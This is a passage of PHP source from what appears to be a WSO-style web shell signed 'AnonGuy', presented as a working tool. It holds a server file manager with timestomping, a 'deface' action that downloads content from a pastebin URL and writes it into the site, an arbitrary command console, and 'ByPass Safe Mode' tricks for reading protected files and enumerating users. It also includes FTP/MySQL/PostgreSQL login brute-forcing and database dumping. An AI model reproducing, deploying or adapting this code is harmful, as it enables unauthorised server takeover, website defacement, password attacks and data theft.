  626. copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
  627. } elseif($_SESSION['act'] == 'move') {
  628. function move_paste($c,$s,$d){
  629. if(is_dir($c.$s)){
  630. mkdir($d.$s);
  631. $h = opendir($c.$s);
  632. while (($f = readdir($h)) !== false)
  633. if (($f != ".") and ($f != "..")) {
  634. copy_paste($c.$s.'/',$f, $d.$s.'/');
  635. }
  636. } elseif(is_file($c.$s)) {
  637. @copy($c.$s, $d.$s);
  638. }
  639. }
  640. foreach($_SESSION['f'] as $f)
  641. @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
  642. }
  643. unset($_SESSION['f']);
  644. break;
  645. default:
  646. if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
  647. $_SESSION['act'] = @$_POST['p1'];
  648. $_SESSION['f'] = @$_POST['f'];
  649. foreach($_SESSION['f'] as $k => $f)
  650. $_SESSION['f'][$k] = urldecode($f);
  651. $_SESSION['cwd'] = @$_POST['c'];
  652. }
  653. break;
  654. }
  655. echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
  656. }
  657. if(isset($_POST['p1']) && $_POST['p1']=='deface') {
  658. $def = file_get_contents('http://pastebin.com/download.php?i=Q72TEV9B');
  659. file_put_contents($_POST['c'].$_POST['p2'],$def);
  660. }
  661. $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  662. if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
  663. global $sort;
  664. $sort = array('name', 1);
  665. if(!empty($_POST['p1'])) {
  666. if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
  667. $sort = array($match[1], (int)$match[2]);
  668. }
  669. echo '<script>
  670. function sa() {
  671. for(i=0;i<document.files.elements.length;i++)
  672. if(document.files.elements[i].type == \'checkbox\')
  673. document.files.elements[i].checked = document.files.elements[0].checked;
  674. }
  675. </script>
  676. <table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>
  677. <form name=files method=post>';
  678. echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
  679. $dirs = $files = $links = array();
  680. $n = count($dirContent);
  681. for($i=0;$i<$n;$i++) {
  682. $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
  683. $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
  684. $tmp = array('name' => $dirContent[$i],
  685. 'path' => $GLOBALS['cwd'].$dirContent[$i],
  686. 'modify' => @date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
  687. 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
  688. 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
  689. 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
  690. 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
  691. );
  692. if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
  693. $files[] = array_merge($tmp, array('type' => 'file'));
  694. elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
  695. $links[] = array_merge($tmp, array('type' => 'link'));
  696. elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
  697. $dirs[] = array_merge($tmp, array('type' => 'dir'));
  698. }
  699. $GLOBALS['sort'] = $sort;
  700. function cmp($a, $b) {
  701. if($GLOBALS['sort'][0] != 'size')
  702. return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
  703. else
  704. return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  705. }
  706. usort($files, "cmp");
  707. usort($dirs, "cmp");
  708. usort($links, "cmp");
  709. $files = array_merge($dirs, $links, $files);
  710. $l = 0;
  711. foreach($files as $f) {
  712. echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
  713. .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
  714. $l = $l?0:1;
  715. }
  716. echo '<tr><td colspan=5>
  717. <input type=hidden name=a value=\'FilesMan\'>
  718. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  719. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  720. <select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>';
  721. if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){echo '<option value=\'paste\'>Paste</option>'; }
  722. echo '</select>&nbsp;<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" id="def" value="AnOnGuY.html" size="10"/>&nbsp;<input type="button" onclick="g(\'FilesMan\',\''.htmlspecialchars($GLOBALS['cwd']).'\',\'deface\',document.getElementById(\'def\').value)" value="Add Deface Here"></td></tr>
  723. </form></table></div>';
  724. printFooter();
  725. }
  726. function actionStringTools() {
  727. if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
  728. if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
  729. if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
  730. if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
  731.  
  732. if(isset($_POST['ajax'])) {
  733. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  734. ob_start();
  735. if(function_exists($_POST['p1']))
  736. echo $_POST['p1']($_POST['p2']);
  737. $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\
  738. \
  739. \t\\'\0")."';\
  740. ";
  741. echo strlen($temp), "\
  742. ", $temp;
  743. exit;
  744. }
  745. printHeader();
  746. echo '<h1>String Converter</h1><div class=content>';
  747. $stringTools = array(
  748. 'Base64 encode' => 'base64_encode',
  749. 'Base64 decode' => 'base64_decode',
  750. 'Url encode' => 'urlencode',
  751. 'Url decode' => 'urldecode',
  752. 'Full urlencode' => 'full_urlencode',
  753. 'md5 hash' => 'md5',
  754. 'sha1 hash' => 'sha1',
  755. 'crypt' => 'crypt',
  756. 'CRC32' => 'crc32',
  757. 'ASCII to HEX' => 'ascii2hex',
  758. 'HEX to ASCII' => 'hex2ascii',
  759. 'HEX to DEC' => 'hexdec',
  760. 'HEX to BIN' => 'hex2bin',
  761. 'DEC to HEX' => 'dechex',
  762. 'DEC to BIN' => 'decbin',
  763. 'BIN to HEX' => 'bin2hex',
  764. 'BIN to DEC' => 'bindec',
  765. 'String to lower case' => 'strtolower',
  766. 'String to upper case' => 'strtoupper',
  767. 'Htmlspecialchars' => 'htmlspecialchars',
  768. 'String length' => 'strlen',
  769. );
  770. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  771. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  772. echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
  773. foreach($stringTools as $k => $v)
  774. echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
  775. echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
  776. if(!empty($_POST['p1'])) {
  777. if(function_exists($_POST['p1']))
  778. echo htmlspecialchars($_POST['p1']($_POST['p2']));
  779. }
  780. echo"</pre></div>";
  781. printFooter();
  782. }
  783.  
  784. function actionFilesTools() {
  785. if( isset($_POST['p1']) )
  786. $_POST['p1'] = urldecode($_POST['p1']);
  787. if(@$_POST['p2']=='download') {
  788. if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
  789. ob_start("ob_gzhandler", 4096);
  790. header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
  791. if (function_exists("mime_content_type")) {
  792. $type = @mime_content_type($_POST['p1']);
  793. header("Content-Type: ".$type);
  794. }
  795. $fp = @fopen($_POST['p1'], "r");
  796. if($fp) {
  797. while(!@feof($fp))
  798. echo @fread($fp, 1024);
  799. fclose($fp);
  800. }
  801. } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
  802.  
  803. }
  804. exit;
  805. }
  806. if( @$_POST['p2'] == 'mkfile' ) {
  807. if(!file_exists($_POST['p1'])) {
  808. $fp = @fopen($_POST['p1'], 'w');
  809. if($fp) {
  810. $_POST['p2'] = "edit";
  811. fclose($fp);
  812. }
  813. }
  814. }
  815. printHeader();
  816. echo '<h1>File tools</h1><div class=content>';
  817. if( !file_exists(@$_POST['p1']) ) {
  818. echo 'File not exists';
  819. printFooter();
  820. return;
  821. }
  822. $uid = @posix_getpwuid(@fileowner($_POST['p1']));
  823. $gid = @posix_getgrgid(@fileowner($_POST['p1']));
  824. echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
  825. echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
  826. if( empty($_POST['p2']) )
  827. $_POST['p2'] = 'view';
  828. if( is_file($_POST['p1']) )
  829. $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
  830. else
  831. $m = array('Chmod', 'Rename', 'Touch');
  832. foreach($m as $v)
  833. echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
  834. echo '<br><br>';
  835. switch($_POST['p2']) {
  836. case 'view':
  837. echo '<pre class=ml1>';
  838. $fp = @fopen($_POST['p1'], 'r');
  839. if($fp) {
  840. while( !@feof($fp) )
  841. echo htmlspecialchars(@fread($fp, 1024));
  842. @fclose($fp);
  843. }
  844. echo '</pre>';
  845. break;
  846. case 'highlight':
  847. if( is_readable($_POST['p1']) ) {
  848. echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
  849. $code = highlight_file($_POST['p1'],true);
  850. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
  851. }
  852. break;
  853. case 'chmod':
  854. if( !empty($_POST['p3']) ) {
  855. $perms = 0;
  856. for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
  857. $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
  858. if(!@chmod($_POST['p1'], $perms))
  859. echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
  860. else
  861. die('<script>g(null,null,null,null,"")</script>');
  862. }
  863. echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
  864. break;
  865. case 'edit':
  866. if( !is_writable($_POST['p1'])) {
  867. echo 'File isn\'t writeable';
  868. break;
  869. }
  870. if( !empty($_POST['p3']) ) {
  871. @file_put_contents($_POST['p1'],$_POST['p3']);
  872. echo 'Saved!<br><script>document.mf.p3.value="";</script>';
  873. }
  874. echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
  875. $fp = @fopen($_POST['p1'], 'r');
  876. if($fp) {
  877. while( !@feof($fp) )
  878. echo htmlspecialchars(@fread($fp, 1024));
  879. @fclose($fp);
  880. }
  881. echo '</textarea><input type=submit value=">>"></form>';
  882. break;
  883. case 'hexdump':
  884. $c = @file_get_contents($_POST['p1']);
  885. $n = 0;
  886. $h = array('00000000<br>','','');
  887. $len = strlen($c);
  888. for ($i=0; $i<$len; ++$i) {
  889. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
  890. switch ( ord($c[$i]) ) {
  891. case 0: $h[2] .= ' '; break;
  892. case 9: $h[2] .= ' '; break;
  893. case 10: $h[2] .= ' '; break;
  894. case 13: $h[2] .= ' '; break;
  895. default: $h[2] .= $c[$i]; break;
  896. }
  897. $n++;
  898. if ($n == 32) {
  899. $n = 0;
  900. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
  901. $h[1] .= '<br>';
  902. $h[2] .= "\
  903. ";
  904. }
  905. }
  906. echo '<table cellspacing=1 cellpadding=5 bgcolor=#000000><tr><td bgcolor=#000000><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#000000><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
  907. break;
  908. case 'rename':
  909. if( !empty($_POST['p3']) ) {
  910. if(!@rename($_POST['p1'], $_POST['p3']))
  911. echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
  912. else
  913. die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
  914. }
  915. echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
  916. break;
  917. case 'touch':
  918. if( !empty($_POST['p3']) ) {
  919. $time = strtotime($_POST['p3']);
  920. if($time) {
  921. if(@touch($_POST['p1'],$time,$time))
  922. die('<script>g(null,null,null,null,"")</script>');
  923. else {
  924. echo 'Fail!<script>document.mf.p3.value="";</script>';
  925. }
  926. } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
  927. }
  928. echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
  929. break;
  930. case 'mkfile':
  931.  
  932. break;
  933. }
  934. echo '</div>';
  935. printFooter();
  936. }
  937.  
  938. function actionSafeMode() {
  939. $temp='';
  940. ob_start();
  941. switch($_POST['p1']) {
  942. case 1:
  943. $temp=@tempnam($test, 'cx');
  944. if(@copy("compress.zlib://".$_POST['p2'], $temp)){
  945. echo @file_get_contents($temp);
  946. unlink($temp);
  947. } else
  948. echo 'Sorry... Can\'t open file';
  949. break;
  950. case 2:
  951. $files = glob($_POST['p2'].'*');
  952. if( is_array($files) )
  953. foreach ($files as $filename)
  954. echo $filename."\
  955. ";
  956. break;
  957. case 3:
  958. $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
  959. curl_exec($ch);
  960. break;
  961. case 4:
  962. ini_restore("safe_mode");
  963. ini_restore("open_basedir");
  964. include($_POST['p2']);
  965. break;
  966. case 5:
  967. for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
  968. $uid = @posix_getpwuid($_POST['p2']);
  969. if ($uid)
  970. echo join(':',$uid)."\
  971. ";
  972. }
  973. break;
  974. case 6:
  975. if(!function_exists('imap_open'))break;
  976. $stream = imap_open($_POST['p2'], "", "");
  977. if ($stream == FALSE)
  978. break;
  979. echo imap_body($stream, 1);
  980. imap_close($stream);
  981. break;
  982. }
  983. $temp = ob_get_clean();
  984. printHeader();
  985. echo '<h1>ByPass Safe Mode !</h1><div class=content>';
  986. echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
  987. if($temp)
  988. echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
  989. echo '</div>';
  990. printFooter();
  991. }
  992.  
  993. function actionConsole() {
  994. if(isset($_POST['ajax'])) {
  995. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  996. ob_start();
  997. echo "document.cf.cmd.value='';\
  998. ";
  999. $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\
  1000. $ ".$_POST['p1']."\
  1001. ".ex($_POST['p1']),"\
  1002. \
  1003. \t\\'\0"));
  1004. if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
  1005. if(@chdir($match[1])) {
  1006. $GLOBALS['cwd'] = @getcwd();
  1007. echo "document.mf.c.value='".$GLOBALS['cwd']."';";
  1008. }
  1009. }
  1010. echo "document.cf.output.value+='".$temp."';";
  1011. echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
  1012. $temp = ob_get_clean();
  1013. echo strlen($temp), "\
  1014. ", $temp;
  1015. exit;
  1016. }
  1017. printHeader();
  1018.  
  1019. echo '<script>
  1020. if(window.Event) window.captureEvents(Event.KEYDOWN);
  1021. var cmds = new Array("");
  1022. var cur = 0;
  1023. function kp(e) {
  1024. var n = (window.Event) ? e.which : e.keyCode;
  1025. if(n == 38) {
  1026. cur--;
  1027. if(cur>=0)
  1028. document.cf.cmd.value = cmds[cur];
  1029. else
  1030. cur++;
  1031. } else if(n == 40) {
  1032. cur++;
  1033. if(cur < cmds.length)
  1034. document.cf.cmd.value = cmds[cur];
  1035. else
  1036. cur--;
  1037. }
  1038. }
  1039. function add(cmd) {
  1040. cmds.pop();
  1041. cmds.push(cmd);
  1042. cmds.push("");
  1043. cur = cmds.length-1;
  1044. }
  1045. </script>';
  1046. echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
  1047. foreach($GLOBALS['aliases'] as $n => $v) {
  1048. if($v == '') {
  1049. echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
  1050. continue;
  1051. }
  1052. echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
  1053. }
  1054. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  1055. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  1056. echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;" readonly>';
  1057. if(!empty($_POST['p1'])) {
  1058. echo htmlspecialchars("$ ".$_POST['p1']."\
  1059. ".ex($_POST['p1']));
  1060. }
  1061. echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;" onkeydown="kp(event);">';
  1062. echo '</form></div><script>document.cf.cmd.focus();</script>';
  1063. printFooter();
  1064. }
  1065.  
  1066. function actionLogout() {
  1067. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1068. echo '<body bgcolor=#000000><center><img src="http://images.all-free-download.com/images/graphiclarge/abstract_indian_shiny_flag_black_tricolor_wave_6818267.jpg"></center></body>';
  1069. }
  1070.  
  1071. function actionSelfRemove() {
  1072. printHeader();
  1073. if($_POST['p1'] == 'yes') {
  1074. if(@unlink(SELF_PATH))
  1075. die('Thank You For Your Hospitality, AnonGuy !!');
  1076. else
  1077. echo 'unlink error!';
  1078. }
  1079. echo '<h1>Suicide</h1><div class=content>You really want to remove me?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
  1080. printFooter();
  1081. }
  1082.  
  1083. function actionBruteforce() {
  1084. printHeader();
  1085. if( isset($_POST['proto']) ) {
  1086. echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
  1087. if( $_POST['proto'] == 'ftp' ) {
  1088. function bruteForce($ip,$port,$login,$pass) {
  1089. $fp = @ftp_connect($ip, $port?$port:21);
  1090. if(!$fp) return false;
  1091. $res = @ftp_login($fp, $login, $pass);
  1092. @ftp_close($fp);
  1093. return $res;
  1094. }
  1095. } elseif( $_POST['proto'] == 'mysql' ) {
  1096. function bruteForce($ip,$port,$login,$pass) {
  1097. $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
  1098. @mysql_close($res);
  1099. return $res;
  1100. }
  1101. } elseif( $_POST['proto'] == 'pgsql' ) {
  1102. function bruteForce($ip,$port,$login,$pass) {
  1103. $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
  1104. $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
  1105. @pg_close($res);
  1106. return $res;
  1107. }
  1108. }
  1109. $success = 0;
  1110. $attempts = 0;
  1111. $server = explode(":", $_POST['server']);
  1112. if($_POST['type'] == 1) {
  1113. $temp = @file('/etc/passwd');
  1114. if( is_array($temp) )
  1115. foreach($temp as $line) {
  1116. $line = explode(":", $line);
  1117. ++$attempts;
  1118. if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
  1119. $success++;
  1120. echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
  1121. }
  1122. if(@$_POST['reverse']) {
  1123. $tmp = "";
  1124. for($i=strlen($line[0])-1; $i>=0; --$i)
  1125. $tmp .= $line[0][$i];
  1126. ++$attempts;
  1127. if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
  1128. $success++;
  1129. echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
  1130. }
  1131. }
  1132. }
  1133. } elseif($_POST['type'] == 2) {
  1134. $temp = @file($_POST['dict']);
  1135. if( is_array($temp) )
  1136. foreach($temp as $line) {
  1137. $line = trim($line);
  1138. ++$attempts;
  1139. if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
  1140. $success++;
  1141. echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
  1142. }
  1143. }
  1144. }
  1145. echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
  1146. }
  1147. echo '<h1>FTP BruteForce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
  1148. .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
  1149. .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
  1150. .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
  1151. .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
  1152. .'<span>Server:Port</span></td>'
  1153. .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
  1154. .'<tr><td><span>Brute type</span></td>'
  1155. .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
  1156. .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
  1157. .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
  1158. .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
  1159. .'<td><input type=text name=login value="AnonGuy"></td></tr>'
  1160. .'<tr><td><span>Dictionary</span></td>'
  1161. .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
  1162. .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
  1163. echo '</div><br>';
  1164. printFooter();
  1165. }
  1166.  
  1167. function actionSql() {
  1168. class DbClass {
  1169. var $type;
  1170. var $link;
  1171. var $res;
  1172. function DbClass($type) {
  1173. $this->type = $type;
  1174. }
  1175. function connect($host, $user, $pass, $dbname){
  1176. switch($this->type) {
  1177. case 'mysql':
  1178. if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
  1179. break;
  1180. case 'pgsql':
  1181. $host = explode(':', $host);
  1182. if(!$host[1]) $host[1]=5432;
  1183. if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
  1184. break;
  1185. }
  1186. return false;
  1187. }
  1188. function selectdb($db) {
  1189. switch($this->type) {
  1190. case 'mysql':
  1191. if (@mysql_select_db($db))return true;
  1192. break;
  1193. }
  1194. return false;
  1195. }
  1196. function query($str) {
  1197. switch($this->type) {
  1198. case 'mysql':
  1199. return $this->res = @mysql_query($str);
  1200. break;
  1201. case 'pgsql':
  1202. return $this->res = @pg_query($this->link,$str);
  1203. break;
  1204. }
  1205. return false;
  1206. }
  1207. function fetch() {
  1208. $res = func_num_args()?func_get_arg(0):$this->res;
  1209. switch($this->type) {
  1210. case 'mysql':
  1211. return @mysql_fetch_assoc($res);
  1212. break;
  1213. case 'pgsql':
  1214. return @pg_fetch_assoc($res);
  1215. break;
  1216. }
  1217. return false;
  1218. }
  1219. function listDbs() {
  1220. switch($this->type) {
  1221. case 'mysql':
  1222. return $this->res = @mysql_list_dbs($this->link);
  1223. break;
  1224. case 'pgsql':
  1225. return $this->res = $this->query("SELECT datname FROM pg_database");
  1226. break;
  1227. }
  1228. return false;
  1229. }
  1230. function listTables() {
  1231. switch($this->type) {
  1232. case 'mysql':
  1233. return $this->res = $this->query('SHOW TABLES');
  1234. break;
  1235. case 'pgsql':
  1236. return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
  1237. break;
  1238. }
  1239. return false;
  1240. }
  1241. function error() {
  1242. switch($this->type) {
  1243. case 'mysql':
  1244. return @mysql_error($this->link);
  1245. break;
  1246. case 'pgsql':
  1247. return @pg_last_error($this->link);
  1248. break;
  1249. }
  1250. return false;
  1251. }
  1252. function setCharset($str) {
  1253. switch($this->type) {
  1254. case 'mysql':
  1255. if(function_exists('mysql_set_charset'))
  1256. return @mysql_set_charset($str, $this->link);
  1257. else
  1258. $this->query('SET CHARSET '.$str);
  1259. break;
  1260. case 'mysql':
  1261. return @pg_set_client_encoding($this->link, $str);
  1262. break;
  1263. }
  1264. return false;
  1265. }
  1266. function dump($table) {
  1267. switch($this->type) {
  1268. case 'mysql':
  1269. $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
  1270. $create = mysql_fetch_array($res);
  1271. echo $create[1].";\
  1272. \
  1273. ";
  1274. $this->query('SELECT * FROM `'.$table.'`');
  1275. while($item = $this->fetch()) {
  1276. $columns = array();
  1277. foreach($item as $k=>$v) {
  1278. $item[$k] = "'".@mysql_real_escape_string($v)."'";
  1279. $columns[] = "`".$k."`";
  1280. }
  1281. echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\
  1282. ";
  1283. }
  1284. break;
  1285. case 'pgsql':
  1286. $this->query('SELECT * FROM '.$table);
  1287. while($item = $this->fetch()) {
  1288. $columns = array();
  1289. foreach($item as $k=>$v) {
  1290. $item[$k] = "'".addslashes($v)."'";
  1291. $columns[] = $k;
  1292. }
